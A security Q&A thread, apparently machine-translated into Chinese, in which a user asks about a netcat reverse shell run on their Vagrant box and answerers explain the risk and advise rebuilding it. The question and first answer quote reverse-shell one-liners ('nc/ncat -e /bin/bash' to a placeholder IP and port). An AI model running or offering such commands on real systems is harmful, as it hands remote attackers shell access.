反向壳如何表现?

信息安全 SSH
2021-08-27 01:36:23

有人在帮我解决流浪服务器上的问题。他能够通过以下方式访问 shell(我用他的 ip 和端口为他运行了它):

nc <ip> -e /bin/bash <port>

我以前从未遇到过这种情况,但它似乎很有趣。

我的主机是Mac。他有可能通过 vagrant guest 访问我的 mac 吗?

我可能应该销毁并重新创建流浪盒,对吗?

3个回答

我假设你的意思是:

ncat -e /bin/bash <ip> <port>

该参数在建立连接时-e启动命令。/bin/bash然后该命令连接到 IP 并执行 bash 以供远程用户进行交互。远程用户获得启动用户所拥有的任何特权。一旦该命令被终止,连接也随之终止。在那里持久连接没问题。

真正的问题是那个人在你的 vagrant box 上做了什么......他可能已经设置或安装了后门,或者其他东西来建立持久连接。

您可以检查会话的历史文件以查看他做了什么,或者如果您无法验证他的操作,则重新构建该框。

Netcat 是用于读取/写入 TCP/UDP 连接的基本网络工具。在您给出的示例中,您告诉它跨 TCP 运行由 -e 指定的程序到远程计算机和端口号。在那个特定的例子中,你正在向他的机器发送一个 bash shell,大概他有一个 netcat 监听器在等待。

Netcat 是真正的网络瑞士军刀。你可以用它做很多事情。你可以:

  • 创建代理
  • 聊天
  • 抢服务标语
  • 端口扫描
  • 反壳
  • 绑定外壳
  • 将其用作简单的 Web 服务器
  • 通过 Internet 传输文件

这是一个非常强大的工具。

要回答您关于他是否可以使用它来访问您的 mac 的问题:不是它本身。您必须启动反向外壳回到他的盒子。没有你发送外壳,他永远无法连接。但是,在连接后,他将能够植入后门以进行持久访问。

具有任何技能的攻击者都会清理他的会话(和系统)日志,因此您甚至不能相信那些能够说出所发生事情的真相。您能做的唯一真正安全的事情就是擦拭盒子。

报告了一个漏洞,攻击者可以通过 3D 加速突破 Virtualbox 来宾并获得对主机操作系统的访问权限。

这需要为来宾操作系统启用 3D 加速。